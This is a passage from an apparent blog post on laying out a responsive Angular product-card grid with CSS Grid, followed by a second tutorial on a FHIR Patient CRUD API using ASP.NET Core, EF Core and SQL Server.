up additional configuration options: ```bash ng add @angular/material ``` Then I'll update the `ProductCardComponent` template to use the `mat-card` component for styling: {% embed https://gist.github.com/cezar-plescan/9b55b5ad4d24583c52f626d98cfd79fa %} _**Note**: You can find more details about using the `mat-card` component in the official Angular Material documentation: https://v18.material.angular.io/components/card/overview._ Next, I run the app (using `ng serve` or `npm run start`) and see a list of basic product cards displayed on the page. However, the layout isn't quite right and the image is taking up the full width of the container, no matter the window size. ![Basic product list](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pa7uq5thx12aft915j3n.png) _**Note**: You can see the code at this stage in the Github repository at this specific revision: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/eda71069e44b6615267f289627f94d01a3e50d2b._ I now need to refine the layout of the product list and style the product cards to make them visually appealing and responsive. I'll cover this in the next section. 
## Preparing the layout and styling the components When I approach the design and layout of a component, I find it helpful to abstract away the specific content initially and focus on the underlying structure. This can save time and effort later on. I think of it like an architect designing the blueprint of a house before deciding on the interior decorations. The blueprint establishes the foundation and framework, while the decorations can be added and modified later. In my case, I'll consider the product list as a container with multiple items. This abstract view allows me to create a flexible and adaptable layout that works well across different screen sizes. Here's the step-by-step approach I typically follow: 1. **Abstraction**: define the core structure of the component without focusing on specific content. 2. **Choose a Design Approach**: select a layout strategy based on the design goals and responsiveness requirements. 3. **Implementation**: translate the chosen design approach into code, using CSS to create the layout structure and style the elements. This methodical process ensures that the resulting layout is robust, adaptable, and visually appealing, regardless of the specific content it will hold. _**Important Note**: In this initial implementation, I'm solely focused on creating the product list functionality. The examples and code snippets provided here only showcase the `ProductListComponent` and its child `ProductCardComponent`. In a real-world e-commerce application, we would typically have a more comprehensive layout that includes a header, navigation menu, page title, footer, and other elements. These elements would be incorporated into the overall application structure using additional components and routing. However, for the sake of clarity and to emphasize the core principles of building a responsive product list, I'm keeping the current implementation focused and minimal._ ### The Power of Abstraction in Layout Design Here's why abstracting away content initially is a valuable approach: **Focus on Core Structure**: By ignoring the specific content initially, we can focus on the fundamental layout principles – how the items should be arranged, the spacing between them, and how the layout should respond to different screen sizes. This allows us to create a solid foundation for our design. **Flexibility and Reusability**: Abstracting the layout makes it easier to reuse the same structure for different types of content. For example, the same grid layout we create for product cards could be used for blog posts, team member profiles, or other types of content. **Simplified Testing**: With a basic layout structure in place, we can test the responsiveness and adaptability of the design without being distracted by the details of the content. This allows us to catch any layout issues early on and iterate on the design more effectively. **Collaboration**: An abstract layout is easier to communicate and discuss with designers and stakeholders. They can focus on the overall structure and flow of the content without getting bogged down in the specifics of each element. **Gradual Refinement**: Once the basic layout is established, we can then gradually add and style the specific content elements. This allows for a more iterative and focused approach to design and development. In our e-commerce application, I can abstract the product list as a container (`product-list`) with multiple items (`product-card`). 
My focus will be on creating a responsive layout that adapts to different screen sizes and ensures proper spacing between items. Once this foundation is established, I'll design and style the individual product cards, filling them with the relevant content (images, names, prices, descriptions). ### Mobile-First Design: Why it matters Next, I need to choose a design approach. Knowing that I'm aiming for a responsive design that works well on various screen sizes, from mobile to desktop, I'll adopt the **Mobile-First Design** approach, a strategy that prioritizes designing and building the mobile version of a website or application first, then progressively enhancing it for larger screens. Here is why Mobile-First Design is often the preferred approach in modern web development: **Progressive Enhancement**: With a mobile-first approach, we start with a simpler, more streamlined layout and then progressively add enhancements for larger screens. This is generally easier and more efficient than trying to strip down a complex desktop design to fit mobile constraints. It also allows for more flexibility and scalability as we can easily add new features or design elements for larger screens without compromising the mobile experience. **Mobile Usage Dominance**: The majority of web traffic now originates from mobile devices. By starting with a mobile-first design, we prioritize the experience for the largest segment of our audience. This ensures that the majority of our users have a smooth and optimized experience right from the start. **Content Prioritization**: Mobile screens have limited real estate, forcing us to focus on the most essential content and interactions. This naturally leads to a cleaner and more streamlined design that translates well to larger screens. Desktop-first designs can sometimes feel cluttered or overwhelming when adapted to mobile, as they might include elements that are less relevant or usable on smaller screens. **Performance Optimization**: Mobile devices often have slower connections and less processing power than desktops. Designing for mobile first forces us to optimize performance from the beginning. This optimization benefits users on all devices, as even desktop users appreciate fast-loading pages. **SEO Benefits**: Search engines like Google prioritize mobile-friendly websites in their rankings. Adopting a mobile-first approach can improve our website's SEO and increase its visibility in search results. _**Note**: If you're interested in learning more about Mobile-First Design, check out these resources:_ - _https://www.youtube.com/watch?v=W1dGYykSR-4: A video tutorial explaining the concepts and benefits of mobile-first design._ - _https://www.manypixels.co/blog/web-design/mobile-first-design: An article discussing the importance of mobile-first design and providing practical tips for implementation._ - _https://www.sanity.io/glossary/mobile-first-design: A concise definition and overview of mobile-first design principles._ With this mobile-first mindset, my approach will be to initially design and style the product list for smaller screens (mobile devices). Then, as I move to larger viewports (tablets and desktops), I'll progressively enhance the layout to accommodate more columns and potentially additional content. ### Implementing the layout for small screens With the mobile-first approach in mind, I'll start implementing the layout for smaller screens. Currently, the product cards are stacked vertically, which is the correct behavior for mobile. 
However, they are lacking spacing between them. #### Determining where to apply spacing The question is: where should I add this spacing? Remembering the principle of separation of concerns, it makes sense to apply the spacing within the `ProductListComponent`, as this component controls the overall layout of the product list. The `ProductCardComponent` should focus on presenting the individual product details, not the spacing between cards. #### Choosing a spacing strategy Now, I need to decide how to add this spacing. There are a few options: - **margins on product cards**: This involves adding a margin to the `product-card` elements, creating space around each card. - **padding on the container**: This involves adding padding to the `product-list` container, creating space between the cards and the container's edges. - **flexbox `gap` property**: If I use Flexbox for the layout, I can leverage the `gap` property to easily control the spacing between items. I'll examine each approach to determine the best fit for the mobile-first layout. #### Apply margins around list items In the product list template, I'll wrap each `ProductCardComponent` element within a `div.product-card`: {% embed https://gist.github.com/cezar-plescan/80b47bfadc416e12872f207ba21a858f %} This provides a target for applying margins directly to the product card wrapper elements, as shown below: {% embed https://gist.github.com/cezar-plescan/25de93916b5fcec0eeea858a875f640c %} After reloading the app, I see a nice, even spacing around each product card. The vertical spacing between adjacent cards is exactly `1rem`, as expected. Here are some screenshots: 1. the first one is the initial display, without any spacing 2. the list after applying the margins 3. the last card has no bottom margin ![apply margins](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ig9h2kgem8ngfytthlpo.png) However, there's one important issue: the last product card doesn't have a visible bottom margin! #### Understanding margin collapsing This behavior is due to a CSS concept called **margin collapsing**. In essence, when vertical margins (top and bottom) are applied to adjacent elements, they sometimes combine into a single margin rather than adding up. This happens when there's no padding, border, or inline content to separate the elements. In this case, each `div.product-card` element has a bottom margin. However, the last product card's bottom margin collapses with the bottom margin of its parent container. This is why we don't see a visible margin below the last card. 
_**Note**: More details about margin collapsing can be found at:_

- _https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_box_model/Mastering_margin_collapsing The MDN Web Docs article provides a comprehensive guide to understanding margin collapsing, its rules, and how to work with it effectively._
- _https://www.joshwcomeau.com/css/rules-of-margin-collapse/ This interactive blog post by Josh Comeau offers a visual and engaging explanation of margin collapsing, making it easier to grasp the concept._

#### Fixing the margin collapsing issue

One of the fixes is to apply a bottom padding to the `.product-list` container element and remove the bottom margin from the last `.product-card` child:

{% embed https://gist.github.com/cezar-plescan/7742228fcb73ba831391561b4da9b156 %}

{% embed https://gist.github.com/cezar-plescan/ef84e7b17f6a1baf5be9fb9d913bd5d5 %}

Now, with these changes applied, the spacing between all product cards appears as expected, with even margins all around. You can check out the code with these changes in the GitHub repository at this revision: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/24ed3e51e3c988c452060c2b1cdd412c4d3786c4.

#### Apply padding around list items

Another solution for creating spacing around the cards is to use padding on their wrappers:

{% embed https://gist.github.com/cezar-plescan/f574b8e0ff2b3e6bface0008f0be64a4 %}

![product card paddings](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ud9hpecrqu03zxbqh20k.png)

With this simple change, each product card now has `1rem` of padding on all sides, visually separating the content from the card's edges. However, as you can see in the screenshot, this approach leads to a new issue: the vertical spacing between adjacent cards is double the intended space, because the bottom padding of one card is added to the top padding of the next.

To resolve this double spacing issue, I can selectively remove the bottom padding from all cards except for the last one in the list. I'll achieve this using the `:not(:last-child)` pseudo-selector:

{% embed https://gist.github.com/cezar-plescan/e3146bee1b7e92b73833cb800b49a943 %}

You can see the code with these changes in the GitHub repository at this revision: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/1d9d60a6319dffee2453eaf4072f708c0d8212a6.

#### The philosophy of spacing: Parent vs Child responsibilities

In the previous solutions, spacing was defined within the `.product-card` selector (the child elements). However, let's revisit the fundamental question: who should be responsible for defining spacing in a parent-child layout relationship?

**Parent's Role: Outer Spacing**

Consider an empty parent container. To create inner spacing, we intuitively apply padding to the parent. This is because padding defines space _within_ an element, pushing its content inwards. While we could achieve a similar visual effect with margins _outside_ the parent, it's not semantically accurate, because margins create space _around_ an element, not within it.

**Child's Role: Inner Spacing**

Now, let's add child elements to the parent. These children will naturally reside within the boundaries defined by the parent's padding. The question then becomes: who controls the spacing _between_ these child elements? The answer lies in the concept of margin. Margins create empty space _around_ elements, so it's the responsibility of each child element to define its own margin to create separation from its siblings.
In our product list, applying `margin-bottom` to each product card (except the last) achieves this goal. If we used padding instead, we'd imply that the space between cards is part of the card itself, which is not semantically correct. Based on this reasoning, a more effective implementation would be: {% embed https://gist.github.com/cezar-plescan/d196f8cc68ed8c3e7fd7b2b3ffd5c17c %} The code with these changes can be found at this specific revision: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/e31fe48758da28321b65125033c9f3cdea151e24. #### Using Flexbox for spacing Another elegant approach to defining spacing is to leverage the power of CSS **Flexbox**. This method aligns perfectly with the principle of separation of concerns, distinguishing between spacing around the list and the space between its items. Here's the implementation: {% embed https://gist.github.com/cezar-plescan/5aa12c9c206b3912218a28325288d076 %} The `gap` property does the heavy lifting here, handling the spacing between the cards. In our current vertical layout, this translates to vertical spacing only. With this approach, we eliminate concerns about margin collapsing, simplifying our code and ensuring consistent spacing between cards. The simplicity of this CSS is a major advantage. Flexbox is a powerful layout tool, and in this case, it allows us to achieve the desired layout with minimal code. For now, I'll refrain from declaring a definitive "best" approach. Let's continue exploring how both margins and Flexbox adapt when we introduce styling for larger screens. This will give us a more comprehensive understanding of their strengths and weaknesses in different scenarios. You can see the changes up to this point in the GitHub repository: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/ca8ab55b9529049da501f7191062651900d98e2c. ### Implementing the layout for larger screens As I transition to designing the layout for larger screens, a key question arises: What should determine the number of product cards per row? Should it be based on the device's screen size, or the available width of the product list container itself? While screen size is a factor, my experience has taught me that relying solely on it can be restrictive. Different devices have varying widths, and the width of our container might change due to the overall page layout or user preferences. Therefore, I believe it's crucial to base the number of cards per row on the available container width. This approach ensures a more flexible and adaptable layout. #### Why container width is key for Responsive Design Here's why prioritizing container width leads to a more adaptable and user-friendly layout: - **Content containers can change**: The width of the product list container might change depending on the overall page layout, user preferences, or other design considerations. Basing the layout on the container width ensures it adapts to these changes dynamically. - **Maximizing space utilization**: By considering the container width, we can maximize the use of available space, ensuring that as many products as possible are displayed without overcrowding or creating an overly sparse layout. - **Graceful degradation**: Users might resize their browser windows or use devices with non-standard screen sizes. Basing the layout on container width allows the design to gracefully adjust and avoid breaking or looking odd. 
#### Choosing the right implementation

Let's revisit the acceptance criteria to guide the implementation:

> - _The product listing page displays products in a grid layout._
> - _Each row of the grid contains a maximum of 4 product items._
> - _The layout is responsive and adapts to different screen sizes._

Since I need to accommodate more cards per row on larger screens, CSS **Grid** is the perfect tool for the job. It allows me to create a flexible, responsive grid layout that adapts to different screen sizes and content while maintaining a visually pleasing arrangement.

To create a dynamic layout while adhering to these constraints, I'll set both minimum and maximum widths for the product cards. This ensures the cards have enough space to display their content comfortably but don't become overly large on wide screens.

In the next section, I'll delve into the CSS code that brings this responsive grid layout to life.

### Implementing the grid layout

To achieve the desired design, I'll build up the styling gradually, based on each requirement.

#### 1. Apply the grid layout

The first step is to establish the `.product-list` as a CSS grid container:

```CSS
.product-list {
    display: grid;
}
```

At this point, the product cards will simply stack vertically, as a single column is the default behavior for a grid without explicit column definitions.

#### 2. Set the minimum card width

Next, I'll define the minimum card width; `240px` is the value agreed upon during the discussion with the PO.

The CSS property for this scenario is `grid-template-columns`, which controls the number and size of columns in the grid. What value should the property take? Since we have a variable number of columns, we can use the **`repeat()`** function with the **`auto-fit`** value for the track count. The `auto-fit` keyword tells the grid to create as many columns as possible within the available space, respecting any minimum or maximum constraints.

Then, I need to define the second argument of the `repeat()` function, which specifies the set of tracks that will be repeated. I need equal columns with a defined minimum width; this translates into `minmax(240px, 1fr)`:

- `240px` is the minimum width each column can be. It ensures that even on smaller screens, where we might only have one or two columns, the product cards will still have enough space to display their content comfortably.
- `1fr` is a fractional unit, meaning that any remaining space in the grid container, after allocating the minimum width to each column, will be distributed equally among the columns. This is what creates the equal-width behavior I want.

Here is the CSS for this:

{% embed https://gist.github.com/cezar-plescan/de4ff6878b3d8078bc5a40eaa40619cb %}

When reloading the app and adjusting the viewport size, I notice that the columns are created dynamically and respect the minimum width, but there can be more than the expected 4 columns on larger screens.

![5 items per row](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/834qcgtxiu7p0xyxd5ye.png)

#### 3. Set a maximum of 4 cards per row

I need to address the issue of displaying more columns than expected on larger screens. To do that, I have to calculate the maximum width each column can take and include it in the first argument of the `minmax()` function. Let's determine what this maximum width is, relative to the parent container.
I could say that the max width is 100% (the container width) / 4 (maximum columns per row) = 25%, but this is wrong because I didn't consider the gaps between the columns. Here is how I can include them:

- Calculate the total width of the gaps: there are 3 gaps between 4 columns, and each gap is `1rem`, so the result is **`(4 - 1) * 1rem`**
- Subtract the total gap width from the container width: `100% - (4 - 1) * 1rem`
- Divide the remaining width by the number of columns: `(100% - (4 - 1) * 1rem) / 4`

This is the maximum value of a column: `calc((100% - (4 - 1) * 1rem) / 4)`

To make the code more flexible and maintainable, I'll use CSS variables instead of hardcoded values. Here is the updated CSS code:

{% embed https://gist.github.com/cezar-plescan/9f93f7e44a73123110a358b98891c023 %}

#### 4. Define a maximum width for product cards

When transitioning from a two-column to a one-column layout, the product card gets very wide and looks a bit odd. I want to limit its width to, let's say, 380px. This will also prevent the cards from stretching excessively on very wide screens.

But where exactly should I apply this constraint? On the `.product-card` wrapper itself, or on its content? When I apply it directly to the `.product-card` elements, the columns in the grid layout could overlap at different container sizes. A proper solution for this case is to apply the max width to the actual content of the `.product-card` wrapper, using the flexbox display:

{% embed https://gist.github.com/cezar-plescan/7d16243b376f026a24c0692055a4861c %}

_**Note**: To get a deeper understanding of CSS Grid layout and its properties, you can refer to the following resources:_

- _https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_grid_layout/Basic_concepts_of_grid_layout This MDN Web Docs article provides a comprehensive overview of the fundamental concepts of CSS Grid, including grid containers, items, tracks, and lines._
- _https://developer.mozilla.org/en-US/docs/Web/CSS/grid-template-columns This MDN Web Docs article focuses specifically on the `grid-template-columns` property, explaining how it defines the columns in a grid layout._
- _https://css-tricks.com/almanac/properties/g/grid-template-columns/ This CSS-Tricks almanac entry offers a detailed explanation of grid-template-columns, including different ways to specify column sizes and examples of how to use it._
- _https://gridbyexample.com/examples/ This website provides a collection of interactive examples demonstrating various CSS Grid techniques, including responsive layouts, grid areas, and more._

#### Check out the code

The changes I've made so far can be found in the `product-list` branch of the GitHub repository: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/product-list.

### See it in action

Here are some screenshots at different screen sizes:

![Two columns per row](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tegccdy4ynwjcln68i2i.png)

![Three columns per row](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s6l7d2ewf7hz9a4scgz5.png)

![Four columns per row](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/houiv0lhbjozm0tv25cn.png)

## Wrapping up

With the current implementation, I've successfully met the acceptance criteria for the MVP product listing page. I've established a responsive grid layout, limited the maximum card and content widths, and created a visually appealing design using Angular Material.
The product list now dynamically adjusts to different screen sizes, ensuring a user-friendly experience across devices. #### Key takeaways In this article, I've laid the groundwork for the e-commerce product listing page. Here's a recap of the key points I've covered. **Topics:** - Discussed the importance of abstracting layout design and choosing the right approach (CSS Grid in our case) for responsive design. - Explored the nuances of `grid-template-columns`, `minmax()`, and other CSS properties for creating a flexible and visually appealing grid. - Deliberated on how to handle spacing, considering both the container and individual product cards. - Implemented a mobile-first design with a maximum of 4 cards per row, addressing potential issues like margin collapsing. - Set up Angular Material to enhance styling and provide pre-built components. **Architectural and Technical Decisions:** - Mobile-First Design: prioritized the mobile experience, starting with a single-column layout and planning to progressively enhance for larger screens. - CSS Grid: chose CSS Grid over Flexbox for its more powerful grid layout capabilities. - `grid-template-columns`: used `auto-fit` and `minmax` to create a responsive grid that adjusts the number of columns based on the available space. - Spacing: defined padding on the container for outer spacing and margins on the card wrappers for inner spacing. - Card styling: styled the product cards using Angular Material and added custom CSS to limit the maximum card and content width for a visually balanced layout. #### Next steps The journey of building a robust e-commerce application doesn't end here. While the core functionality is in place, there are several areas for improvement that I'll address in future iterations: - Content Overflow: I need to handle cases where product names or descriptions might be too long and overflow the card's boundaries. I'll explore strategies like truncating text or adding "Read More" functionality. - Image Optimization: Angular is currently warning us about potentially oversized images. I'll look into image optimization techniques to ensure fast loading times and a smooth user experience. - Web Accessibility: To make the product list accessible to all users, I'll follow WCAG (Web Content Accessibility Guidelines) and implement features like alternative text for images and keyboard navigation. In the next article of this series, I'll tackle these enhancements and dive deeper into the technical details of styling and refining the product list. ______ Stay tuned for more insights and practical tips as I continue to build the e-commerce application step by step!
cezar-plescan
1,917,224
FHIR crud app using aspnet core 8.0 and sql server
Hi EveryOne! I would like to discuss today, the crud operation for the patient resource using HL7 R4...
0
2024-07-13T11:35:58
https://dev.to/mannawar/fhir-crud-app-using-aspnet-core-80-and-sql-server-59p1
microsoft, hl7, sqlserver, apnetcore
Hi everyone! Today I would like to discuss CRUD operations for the Patient resource, using the HL7 R4 model with ASP.NET Core and saving the patient data to SQL Server using EF Core.

For modelling the data I have used this package. Ref: https://www.nuget.org/packages/Hl7.Fhir.R4, https://www.hl7.org/fhir/resource.html#identification

Each resource is uniquely identified by its id. I have made the Id database-generated, so we don't need to specify it explicitly when sending a request.

So basically, this is my PatientEntity class.

```
using System.ComponentModel.DataAnnotations;
using System.ComponentModel.DataAnnotations.Schema;
using Hl7.Fhir.Model;

public class PatientEntity
{
    [Key]
    [DatabaseGenerated(DatabaseGeneratedOption.Identity)]
    public string Id { get; set; } = Guid.NewGuid().ToString();

    [Required]
    public string FamilyName { get; set; } = string.Empty;

    [Required]
    public string GivenName { get; set; } = string.Empty;

    [Required]
    public string Gender { get; set; } = string.Empty;

    [Required]
    public DateTime BirthDate { get; set; } = DateTime.MinValue;

    public byte[]? PhotoData { get; set; }

    public static PatientEntity FromFhirPatient(Patient patient)
    {
        byte[]? photoData = null;
        if (patient.Photo != null && patient.Photo.Count > 0 && patient.Photo[0].Data != null)
        {
            photoData = patient.Photo[0].Data;
        }

        DateTime birthDate = patient.BirthDateElement?.ToDateTimeOffset()?.DateTime ?? DateTime.MinValue;

        return new PatientEntity
        {
            Id = patient.Id ?? Guid.NewGuid().ToString(),
            FamilyName = patient.Name.FirstOrDefault()?.Family ?? string.Empty,
            GivenName = patient.Name.FirstOrDefault()?.Given.FirstOrDefault() ?? string.Empty,
            Gender = patient.Gender.HasValue ? patient.Gender.Value.ToString() : string.Empty,
            BirthDate = birthDate,
            PhotoData = photoData
        };
    }

    public Patient ToFhirPatient()
    {
        return new Patient
        {
            Id = Id,
            Name = new List<HumanName>
            {
                new HumanName { Family = FamilyName, Given = new List<string> { GivenName } }
            },
            Gender = !string.IsNullOrEmpty(Gender)
                ? (AdministrativeGender)Enum.Parse(typeof(AdministrativeGender), Gender, true)
                : null,
            BirthDate = BirthDate.ToString("yyyy-MM-dd"),
            Photo = PhotoData != null
                ? new List<Attachment> { new Attachment { Data = PhotoData } }
                : null
        };
    }
}
```

The properties defined above follow the HL7 R4 model. I have also defined two mapping methods: a static `FromFhirPatient` (converts a FHIR Patient object into a PatientEntity object) and an instance method `ToFhirPatient` (converts a PatientEntity object back into a FHIR Patient object).

The details of the modelling classes can be found in the FHIR documentation, and we can customize accordingly. The `Σ` flag marks a summary element: one that is returned when a client requests only the summary of a resource, which is helpful when working with large resources and improves efficiency. (A separate `?!` flag marks modifier elements, which can change the interpretation of a resource.) Then there is cardinality, e.g. (0..1), meaning the field can appear a minimum of 0 times and a maximum of 1 time. More details on data modelling can be found here. Ref: `https://www.hl7.org/fhir/patient.html`

The code below configures the DbContext.
```
using Microsoft.EntityFrameworkCore;

public class ApplicationDbContext : DbContext
{
    public ApplicationDbContext(DbContextOptions<ApplicationDbContext> options) : base(options)
    {
    }

    public DbSet<PatientEntity> Patients { get; set; }

    protected override void OnModelCreating(ModelBuilder modelBuilder)
    {
        base.OnModelCreating(modelBuilder);
    }
}
```

The constructor,

`public ApplicationDbContext(DbContextOptions<ApplicationDbContext> options) : base(options) { }`

lets the dependency injection system configure ApplicationDbContext properly, which supports separation of concerns: the options for the DbContext (typically things like the database connection) are configured inside Program.cs, which I will discuss next. `base(options)` passes the options parameter to the base DbContext constructor.

The property `public DbSet<PatientEntity> Patients { get; set; }` represents the Patients table in the database. The ModelBuilder class provides the API surface for configuring a DbContext to map entities to the database schema.

This is my Program class:

```
using Hl7.Fhir.Model;
using Hl7.Fhir.Serialization;
using Microsoft.EntityFrameworkCore;
using NetCrudApp.Data;
using System.Text.Json.Serialization;

var builder = WebApplication.CreateBuilder(args);

builder.Services.AddControllers()
    .AddJsonOptions(opt =>
    {
        IList<JsonConverter> fhirConverters = opt.JsonSerializerOptions.ForFhir(ModelInfo.ModelInspector).Converters;
        IList<JsonConverter> convertersToAdd = new List<JsonConverter>(fhirConverters);
        foreach (JsonConverter fhirConverter in convertersToAdd)
        {
            opt.JsonSerializerOptions.Converters.Add(fhirConverter);
        }
        opt.JsonSerializerOptions.Encoder = System.Text.Encodings.Web.JavaScriptEncoder.UnsafeRelaxedJsonEscaping;
    });

var connectionString = builder.Configuration.GetConnectionString("DefaultConnection");
builder.Services.AddDbContext<ApplicationDbContext>(options =>
{
    options.UseSqlServer(connectionString);
});

builder.Services.AddEndpointsApiExplorer();
builder.Services.AddSwaggerGen();
builder.Services.AddHttpClient(); // added this line to converse with the Microsoft FHIR server

var app = builder.Build();

// Configure the HTTP request pipeline.
if (app.Environment.IsDevelopment())
{
    app.UseSwagger();
    app.UseSwaggerUI();
}

app.UseHttpsRedirection();
app.UseAuthorization();
app.MapControllers();

using (var scope = app.Services.CreateScope())
{
    var dbContext = scope.ServiceProvider.GetRequiredService<ApplicationDbContext>();
    await dbContext.Database.MigrateAsync();
}

app.Run();
```

Here, these lines

```
IList<JsonConverter> fhirConverters = opt.JsonSerializerOptions.ForFhir(ModelInfo.ModelInspector).Converters;
IList<JsonConverter> convertersToAdd = new List<JsonConverter>(fhirConverters);
foreach (JsonConverter fhirConverter in convertersToAdd)
{
    opt.JsonSerializerOptions.Converters.Add(fhirConverter);
}
opt.JsonSerializerOptions.Encoder = System.Text.Encodings.Web.JavaScriptEncoder.UnsafeRelaxedJsonEscaping;
```

are required for serialization of the data; without them, the framework throws the error `The collection type 'Hl7.Fhir.Model.Patient' is abstract, an interface, or is read only, and could not be instantiated and populated.` Also, we need to initialize a new list of converters with `IList<JsonConverter> convertersToAdd = new List<JsonConverter>(fhirConverters);`, otherwise we would end up modifying the original list, which of course is not what we want.
Also, the line `opt.JsonSerializerOptions.Encoder = System.Text.Encodings.Web.JavaScriptEncoder.UnsafeRelaxedJsonEscaping;` allows characters that would normally be escaped, like &, <, and >, to remain unescaped, which is useful for the interoperability and readability of the JSON output, but it should be used cautiously.

In summary, these converters handle the serialization and deserialization of FHIR model data, which is a complex type that native converters like Newtonsoft struggle with: **deserializing** requests so the data can be saved to the database, and **serializing** responses returned to the client. Ref: `https://github.com/FirelyTeam/firely-net-sdk/issues/2583`

These lines

```
var connectionString = builder.Configuration.GetConnectionString("DefaultConnection");
builder.Services.AddDbContext<ApplicationDbContext>(options =>
{
    options.UseSqlServer(connectionString);
});
```

specify the connection string for the app, which is defined inside appsettings.json. For simplicity's sake, I have defined the connection string directly in appsettings.json, since we are developing against a local SQL Server only. For an Azure deployment, we can configure services to manage secrets properly.

appsettings.json is shown below; it simply specifies the connection string and the logging level. If you want more information from logging, just change `Warning` to `Information` inside appsettings.json or appsettings.Development.json.

```
{
  "Logging": {
    "LogLevel": {
      "Default": "Information",
      "Microsoft.AspNetCore": "Warning"
    }
  },
  "AllowedHosts": "*",
  "ConnectionStrings": {
    "DefaultConnection": "Server=.;Database=FhirLocalDb;Integrated Security=true;TrustServerCertificate=true;"
  }
}
```

Further, this block inside Program.cs

```
using (var scope = app.Services.CreateScope())
{
    var dbContext = scope.ServiceProvider.GetRequiredService<ApplicationDbContext>();
    await dbContext.Database.MigrateAsync();
}
```

is used to apply any pending migrations. But before that, we need to add a migration and update the database using the commands below.

```
dotnet ef migrations add InitialCreate
dotnet ef database update
```

Next, this is my patient controller class:

```
[Route("fhir/patient")]
[ApiController]
public class PatientResourceProvider : ControllerBase
{
    private readonly ApplicationDbContext _context;

    public PatientResourceProvider(ApplicationDbContext context)
    {
        _context = context;
    }

    [HttpGet("{id}")]
    public async Task<IActionResult> GetPatient(string id)
    {
        try
        {
            // https://stackoverflow.com/questions/62899915/converting-null-literal-or-possible-null-value-to-non-nullable-type
            PatientEntity? patientEntity = await _context.Patients.FindAsync(id);
            if (patientEntity != null)
            {
                return Ok(patientEntity);
            }
            else
            {
                return NotFound(new { Message = "Patient not found" });
            }
        }
        catch (FhirOperationException ex) when (ex.Status == System.Net.HttpStatusCode.NotFound)
        {
            return NotFound(new { Message = "Patient not found" });
        }
        catch (Exception ex)
        {
            return StatusCode(500, new { Message = "An error occurred", Details = ex.Message });
        }
    }

    [HttpPost]
    public async Task<IActionResult> CreatePatient([FromBody] Patient patient)
    {
        using var transaction = await _context.Database.BeginTransactionAsync();
        try
        {
            if (!ModelState.IsValid)
            {
                return BadRequest(ModelState);
            }

            PatientEntity patientEntity = PatientEntity.FromFhirPatient(patient);
            _context.Patients.Add(patientEntity);
            await _context.SaveChangesAsync();
            await transaction.CommitAsync();

            return CreatedAtAction(nameof(GetPatient), new { id = patientEntity.Id }, patientEntity.ToFhirPatient());
        }
        catch (Exception ex)
        {
            await transaction.RollbackAsync();
            return StatusCode(500, new { Message = "An error occurred", Details = ex.Message });
        }
    }

    [HttpPut("{id}")]
    public async Task<IActionResult> UpdatePatient(string id, [FromBody] Patient patient)
    {
        if (id == null)
        {
            return BadRequest(new { Message = "Patient id cannot be null" });
        }

        using var transaction = await _context.Database.BeginTransactionAsync();
        try
        {
            PatientEntity? patientEntity = await _context.Patients.FindAsync(id);
            if (patientEntity == null)
            {
                return NotFound(new { Message = "Patient not found" });
            }
            if (patient.Name == null || patient.Name.Count == 0 || string.IsNullOrEmpty(patient.Name[0].Family))
            {
                return BadRequest(new { Message = "Patient name is required" });
            }

            patientEntity.FamilyName = patient.Name.FirstOrDefault()?.Family ?? string.Empty;
            patientEntity.GivenName = patient.Name.FirstOrDefault()?.Given.FirstOrDefault() ?? string.Empty;
            patientEntity.Gender = patient.Gender.HasValue ? patient.Gender.Value.ToString().ToLower() : string.Empty;
            patientEntity.BirthDate = patient.BirthDateElement?.ToDateTimeOffset()?.DateTime ?? DateTime.MinValue;

            _context.Entry(patientEntity).State = EntityState.Modified;
            await _context.SaveChangesAsync();
            await transaction.CommitAsync();

            return NoContent();
        }
        catch (DbUpdateConcurrencyException)
        {
            if (!_context.Patients.Any(e => e.Id == id))
            {
                return NotFound(new { Message = "Patient not found" });
            }
            else
            {
                throw;
            }
        }
        catch (Exception ex)
        {
            await transaction.RollbackAsync();
            return StatusCode(500, new { Message = "An error occurred", Details = ex.Message });
        }
    }

    [HttpDelete("{id}")]
    public async Task<IActionResult> DeletePatient(string id)
    {
        using var transaction = await _context.Database.BeginTransactionAsync();
        try
        {
            var patientEntity = await _context.Patients.FindAsync(id);
            if (patientEntity == null)
            {
                return NotFound(new { Message = "Patient not found" });
            }

            _context.Patients.Remove(patientEntity);
            await _context.SaveChangesAsync();
            await transaction.CommitAsync();

            return NoContent();
        }
        catch (Exception ex)
        {
            await transaction.RollbackAsync();
            return StatusCode(500, new { Message = "An error occurred", Details = ex.Message });
        }
    }
    [HttpGet("search")]
    public async Task<IActionResult> SearchPatient([FromQuery] string? name = null, string? id = null)
    {
        try
        {
            IQueryable<PatientEntity> query = _context.Patients;
            if (!string.IsNullOrEmpty(name))
            {
                query = query.Where(n => n.FamilyName == name || n.GivenName == name);
            }
            if (!string.IsNullOrEmpty(id))
            {
                query = query.Where(p => p.Id == id);
            }

            var patients = await query.ToListAsync();
            if (!patients.Any())
            {
                return NotFound(new { Message = "No Patient found" });
            }

            return Ok(patients);
        }
        catch (Exception ex)
        {
            return StatusCode(500, new { Message = "An error occurred", Details = ex.Message });
        }
    }
}
```

Starting with the POST request:

```
[HttpPost]
public async Task<IActionResult> CreatePatient([FromBody] Patient patient)
{
    using var transaction = await _context.Database.BeginTransactionAsync();
    try
    {
        if (!ModelState.IsValid)
        {
            return BadRequest(ModelState);
        }

        PatientEntity patientEntity = PatientEntity.FromFhirPatient(patient);
        _context.Patients.Add(patientEntity);
        await _context.SaveChangesAsync();
        await transaction.CommitAsync();

        return CreatedAtAction(nameof(GetPatient), new { id = patientEntity.Id }, patientEntity.ToFhirPatient());
    }
    catch (Exception ex)
    {
        await transaction.RollbackAsync();
        return StatusCode(500, new { Message = "An error occurred", Details = ex.Message });
    }
}
```

